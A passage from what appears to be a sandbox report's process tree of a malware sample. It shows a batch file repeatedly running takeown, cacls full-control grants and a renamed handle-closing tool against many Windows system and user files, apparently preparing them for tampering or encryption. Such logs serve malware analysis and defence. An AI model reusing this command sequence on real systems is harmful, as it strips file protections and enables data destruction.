      wUY1KnWt.exe -accepteula "WuProvider.9cbc80f2-3967-41ff-842c-1a3366c13c32.1.etl" -nobanner
      4⤵
      PID:4232
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4268
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""
  2⤵
  PID:4164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"
    3⤵
    PID:4364
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4396
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4392
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml""
  2⤵
  PID:4296
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftLync2013Win64.xml"
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
    3⤵
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftLync2013Win64.xml" -nobanner
      4⤵
      PID:4556
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4460
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml""
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:4228
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2016BackupWin32.xml"
    3⤵
    PID:4620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
    3⤵
    PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2016BackupWin32.xml" -nobanner
      4⤵
      PID:4668
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4648
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml""
  2⤵
  PID:4684
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml" /E /G Admin:F /C
    3⤵
    PID:4672
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftWordpad.xml"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftWordpad.xml" -nobanner
    3⤵
    PID:4748
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftWordpad.xml" -nobanner
      4⤵
      PID:4764
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4792
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat""
  2⤵
  PID:4780
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat" /E /G Admin:F /C
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\S-1-5-21-790714498-1549421491-1643397139-1000\SystemAppData\Helium\Cache\75fbd12bafcbd46e_COM15.dat"
    3⤵
    PID:4840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
    3⤵
    PID:4908
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "75fbd12bafcbd46e_COM15.dat" -nobanner
      4⤵
      PID:4924
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4952
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl""
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" /E /G Admin:F /C
    3⤵
    PID:4884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl"
    3⤵
    - Modifies file permissions
    PID:4872
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" -nobanner
    3⤵
    PID:5032
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "NotificationUxBroker.8674981e-d64d-4b8c-b159-f188b34f2692.1.etl" -nobanner
      4⤵
      PID:5052
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5064
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.79254dc9-a5a8-49bb-b3ef-d510750ed835.1.etl""
  2⤵
  PID:1516
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.79254dc9-a5a8-49bb-b3ef-d510750ed835.1.etl" /E /G Admin:F /C
    3⤵
    PID:5092
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.79254dc9-a5a8-49bb-b3ef-d510750ed835.1.etl"
    3⤵
    - Modifies file permissions
    PID:4132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.79254dc9-a5a8-49bb-b3ef-d510750ed835.1.etl" -nobanner
    3⤵
    PID:5104
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.79254dc9-a5a8-49bb-b3ef-d510750ed835.1.etl" -nobanner
      4⤵
      PID:284
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5024
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:5016
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:2752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    PID:4208
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4240
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4264
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4044
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:4168
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:4368
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    PID:4384
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:4400
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4428
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4284
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml""
  2⤵
  PID:4292
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml" /E /G Admin:F /C
    3⤵
    PID:4536
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftInternetExplorer2013Backup.xml"
    3⤵
    - Modifies file permissions
    PID:4552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
    3⤵
    PID:4524
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftInternetExplorer2013Backup.xml" -nobanner
      4⤵
      PID:4492
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4312
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml""
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml" /E /G Admin:F /C
    3⤵
    PID:4612
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013Office365Win64.xml"
    3⤵
    - Modifies file permissions
    PID:4660
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
    3⤵
    PID:4628
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013Office365Win64.xml" -nobanner
      4⤵
      PID:4656
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4324
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml""
  2⤵
  PID:4440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml" /E /G Admin:F /C
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2016CAWin64.xml"
    3⤵
    PID:4756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
    3⤵
    PID:4800
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2016CAWin64.xml" -nobanner
      4⤵
      PID:4748
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4796
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd""
  2⤵
  PID:4576
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd" /E /G Admin:F /C
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\Templates\SettingsLocationTemplate2013.xsd"
    3⤵
    - Modifies file permissions
    PID:3484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
    3⤵
    PID:4864
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "SettingsLocationTemplate2013.xsd" -nobanner
      4⤵
      PID:4920
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4924
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png""
  2⤵
  PID:4960
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png" /E /G Admin:F /C
    3⤵
    PID:4972
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png"
    3⤵
    - Modifies file permissions
    PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "device.png" -nobanner
    3⤵
    PID:5004
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "device.png" -nobanner
      4⤵
      PID:376
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4984
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml""
  2⤵
  PID:2760
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4944
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\it-IT\resource.xml"
    3⤵
    - Modifies file permissions
    PID:2972
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:5092
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:1240
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5056
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml""
  2⤵
  PID:5104
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:5080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\tasks.xml"
    3⤵
    - Modifies file permissions
    PID:300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:4188
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:4216
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2116
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin""
  2⤵
  PID:4240
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin" /E /G Admin:F /C
    3⤵
    PID:5008
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\Admin\AppData\Local\Microsoft\GameDVR\KnownGameList.bin"
    3⤵
    - Modifies file permissions
    PID:296
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "KnownGameList.bin" -nobanner
    3⤵
    PID:4368
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "KnownGameList.bin" -nobanner
      4⤵
      PID:4384
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4336
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl""
  2⤵
  PID:4428
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" /E /G Admin:F /C
    3⤵
    PID:4372
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl"
    3⤵
    PID:4432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
    3⤵
    PID:4536
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MoUsoCoreWorker.bd986a82-15ec-44c3-ba13-593bc1047de7.1.etl" -nobanner
      4⤵
      PID:4520
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4476
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl""
  2⤵
  PID:4524
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" /E /G Admin:F /C
    3⤵
    PID:4160
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
    3⤵
    PID:4640
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "WuProvider.aa970506-f5b9-49fa-9427-b94673363750.1.etl" -nobanner
      4⤵
      PID:4668
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4464
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml""
  2⤵
  PID:4456
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml" /E /G Admin:F /C
    3⤵
    PID:4704
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\DesktopSettings2013.xml"
    3⤵
    PID:2932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "DesktopSettings2013.xml" -nobanner
    3⤵
    PID:3080
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "DesktopSettings2013.xml" -nobanner
      4⤵
      PID:4764
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4800
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml""
  2⤵
  PID:4596
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml" /E /G Admin:F /C
    3⤵
    PID:4588
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOffice2013BackupWin32.xml"
    3⤵
    PID:4716
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
    3⤵
    PID:4888
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOffice2013BackupWin32.xml" -nobanner
      4⤵
      PID:4932
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4920
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml""
  2⤵
  PID:4956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml" /E /G Admin:F /C
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\MicrosoftOutlook2013CAWin32.xml"
    3⤵
    PID:4980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
    3⤵
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "MicrosoftOutlook2013CAWin32.xml" -nobanner
      4⤵
      PID:2216
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:376
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml""
  2⤵
  PID:5032
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml" /E /G Admin:F /C
    3⤵
    PID:4868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\UEV\InboxTemplates\VdiState.xml"
    3⤵
    PID:1628
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "VdiState.xml" -nobanner
    3⤵
    PID:4124
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
      wUY1KnWt.exe -accepteula "VdiState.xml" -nobanner
      4⤵
      PID:5012
- - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
    wUY1KnWt.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4136
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mTpFjJS0.bat" "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl""
  2⤵
  PID:5100
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" /E /G Admin:F /C
    3⤵
    PID:4996
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl"
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wUY1KnWt.exe -accepteula "UpdateSessionOrchestration.f7680376-24e8-417e-bf55-bfb3caa3dadd.1.etl" -nobanner
    3⤵
    PID:5080
  - - C:\Users\Admin\AppData\Local\Temp\wUY1KnWt.exe
